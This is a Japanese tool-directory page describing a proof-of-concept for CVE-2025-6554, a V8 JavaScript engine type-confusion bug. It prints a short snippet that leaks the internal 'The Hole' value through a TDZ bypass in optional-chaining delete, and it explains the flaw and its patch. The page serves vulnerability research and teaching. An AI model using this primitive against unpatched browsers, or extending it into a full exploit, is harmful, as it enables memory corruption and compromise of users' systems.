Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6554 — CVE-2025-6554の概念実証エクスプロイト:オプショナルチェイニングのdeleteにおけるTDZバイパスを介したV8 JavaScriptエンジンの型混乱、それによりメモリ破壊のためのThe Holeエスケープを可能にする。 | Kitploit
ツール/GitHubGitHub/pwntoday/cve-2025-6554
脆弱性分析エクスプロイト論文と研究学習と教育バイナリエクスプロイト
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

CVE-2025-6554の概念実証エクスプロイト:オプショナルチェイニングのdeleteにおけるTDZバイパスを介したV8 JavaScriptエンジンの型混乱、それによりメモリ破壊のためのThe Holeエスケープを可能にする。

リポジトリを見る
211ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

バグ

変数 y が宣言前にアクセスされました。通常は ReferenceError(TDZ)が発生しますが、古い V8 では delete x?.[y] と組み合わさるとチェックが失敗し、内部のセンチネル値「The Hole」が返されました。

パッチ前

V8 は TDZ チェックを一度だけ行い、その後 y が有効であると誤って仮定していました。これにより、「The Hole」がユーザーコードに漏れ出す可能性がありました。

修正

パッチにより、アクセスごとに新しい TDZ チェック(ThrowReferenceErrorIfHole)が強制され、初期化前の y は常に例外をスローするようになりました。

影響: 攻撃者は「The Hole」を捕捉し、型混乱、スタックトリック、スコープバイパスに悪用する可能性があります。

ツールをダウンロード